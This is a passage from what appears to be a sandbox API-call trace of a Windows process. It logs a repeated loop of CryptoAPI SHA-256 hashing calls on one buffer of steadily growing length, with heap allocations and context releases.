hHash=0x3396ef60, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d50 [0186.646] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32e84d50, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84d50, pdwDataLen=0xcdf6c) returned 1 [0186.646] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0186.646] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0186.646] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.646] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.646] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0186.646] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.646] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84de0 [0186.647] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e84de0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84de0, pdwDataLen=0xcdf6c) returned 1 [0186.647] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.647] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.647] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.647] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.647] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0186.647] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.647] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84bd0 [0186.647] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e84bd0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84bd0, pdwDataLen=0xcdf6c) returned 1 [0186.647] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.647] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.647] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338238d0) returned 1 [0186.648] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.648] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0186.648] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.648] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84d20 [0186.648] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e84d20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84d20, pdwDataLen=0xcdf6c) returned 1 [0186.648] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.648] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0186.648] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.648] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.648] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0186.649] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e84db0 [0186.649] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e84db0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e84db0, pdwDataLen=0xcdf6c) returned 1 [0186.649] CryptDestroyHash (hHash=0x3396f200) returned 1 [0186.649] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.649] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.649] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.649] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0186.649] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.649] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85350 [0186.649] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85350, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85350, pdwDataLen=0xcdf6c) returned 1 [0186.649] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.649] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.649] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821ed0) returned 1 [0186.650] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.650] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0186.650] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.650] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85410 [0186.650] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85410, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85410, pdwDataLen=0xcdf6c) returned 1 [0186.650] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.650] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0186.650] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822cd0) returned 1 [0186.653] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.653] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0186.653] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.653] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85bf0 [0186.653] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85bf0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85bf0, pdwDataLen=0xcdf6c) returned 1 [0186.653] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.653] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0186.653] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338233d0) returned 1 [0186.654] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.654] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0186.654] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85770 [0186.654] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e85770, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85770, pdwDataLen=0xcdf6c) returned 1 [0186.654] CryptDestroyHash (hHash=0x3396f890) returned 1 [0186.654] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0186.654] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.655] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.655] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0186.655] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.655] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85830 [0186.655] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e85830, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85830, pdwDataLen=0xcdf6c) returned 1 [0186.655] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.655] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.655] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.655] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.655] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0186.655] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.655] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85860 [0186.655] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e85860, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85860, pdwDataLen=0xcdf6c) returned 1 [0186.655] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.656] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.656] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33821dd0) returned 1 [0186.656] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.656] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0186.656] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.656] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e857a0 [0186.656] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e857a0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e857a0, pdwDataLen=0xcdf6c) returned 1 [0186.656] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.656] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0186.656] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338227d0) returned 1 [0186.657] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.657] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0186.657] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.657] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85c80 [0186.657] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85c80, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85c80, pdwDataLen=0xcdf6c) returned 1 [0186.657] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.657] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0186.657] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.657] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.657] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0186.658] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85ad0 [0186.658] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32e85ad0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85ad0, pdwDataLen=0xcdf6c) returned 1 [0186.658] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0186.658] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.658] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.658] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.658] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0186.658] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85e30 [0186.658] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32e85e30, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85e30, pdwDataLen=0xcdf6c) returned 1 [0186.658] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0186.658] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.658] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.659] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.659] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0186.659] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.659] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85320 [0186.659] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e85320, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85320, pdwDataLen=0xcdf6c) returned 1 [0186.659] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.659] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.659] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822fd0) returned 1 [0186.660] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.660] CryptHashData (hHash=0x3396ebe0, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0186.660] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.660] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85aa0 [0186.660] CryptGetHashParam (in: hHash=0x3396ebe0, dwParam=0x2, pbData=0x32e85aa0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85aa0, pdwDataLen=0xcdf6c) returned 1 [0186.660] CryptDestroyHash (hHash=0x3396ebe0) returned 1 [0186.660] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0186.660] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338220d0) returned 1 [0186.661] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.661] CryptHashData (hHash=0x3396f7b0, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0186.661] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.661] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85e60 [0186.661] CryptGetHashParam (in: hHash=0x3396f7b0, dwParam=0x2, pbData=0x32e85e60, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85e60, pdwDataLen=0xcdf6c) returned 1 [0186.661] CryptDestroyHash (hHash=0x3396f7b0) returned 1 [0186.661] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0186.661] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33823bd0) returned 1 [0186.661] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.661] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0186.661] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.661] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85440 [0186.662] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32e85440, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85440, pdwDataLen=0xcdf6c) returned 1 [0186.662] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0186.662] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0186.662] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338225d0) returned 1 [0186.662] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.662] CryptHashData (hHash=0x3396f040, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0186.662] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e857d0 [0186.662] CryptGetHashParam (in: hHash=0x3396f040, dwParam=0x2, pbData=0x32e857d0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e857d0, pdwDataLen=0xcdf6c) returned 1 [0186.662] CryptDestroyHash (hHash=0x3396f040) returned 1 [0186.662] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0186.662] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338237d0) returned 1 [0186.664] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.664] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0186.664] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.664] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85650 [0186.664] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e85650, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85650, pdwDataLen=0xcdf6c) returned 1 [0186.665] CryptDestroyHash (hHash=0x3396f430) returned 1 [0186.665] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0186.665] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x33822ad0) returned 1 [0186.665] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.665] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0186.665] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.665] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85da0 [0186.665] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e85da0, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85da0, pdwDataLen=0xcdf6c) returned 1 [0186.665] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0186.665] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0186.665] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338232d0) returned 1 [0186.668] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.668] CryptHashData (hHash=0x3396f900, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0186.668] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85680 [0186.668] CryptGetHashParam (in: hHash=0x3396f900, dwParam=0x2, pbData=0x32e85680, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85680, pdwDataLen=0xcdf6c) returned 1 [0186.668] CryptDestroyHash (hHash=0x3396f900) returned 1 [0186.668] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0186.668] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338236d0) returned 1 [0186.669] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.669] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0186.669] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.669] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85a10 [0186.669] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85a10, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85a10, pdwDataLen=0xcdf6c) returned 1 [0186.669] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.669] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0186.669] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338234d0) returned 1 [0186.670] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.670] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0186.670] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xcdf6c, pdwDataLen=0xcdf7c, dwFlags=0x0 | out: pbData=0xcdf6c, pdwDataLen=0xcdf7c) returned 1 [0186.670] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e85c20 [0186.670] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e85c20, pdwDataLen=0xcdf6c, dwFlags=0x0 | out: pbData=0x32e85c20, pdwDataLen=0xcdf6c) returned 1 [0186.670] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0186.670] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0186.670] CryptAcquireContextW (in: phProv=0xcdf80, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdf80*=0x338228d0) returned 1 [0186.670] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdf70 | out: phHash=0xcdf70) returned 1 [0186.670] CryptHashData 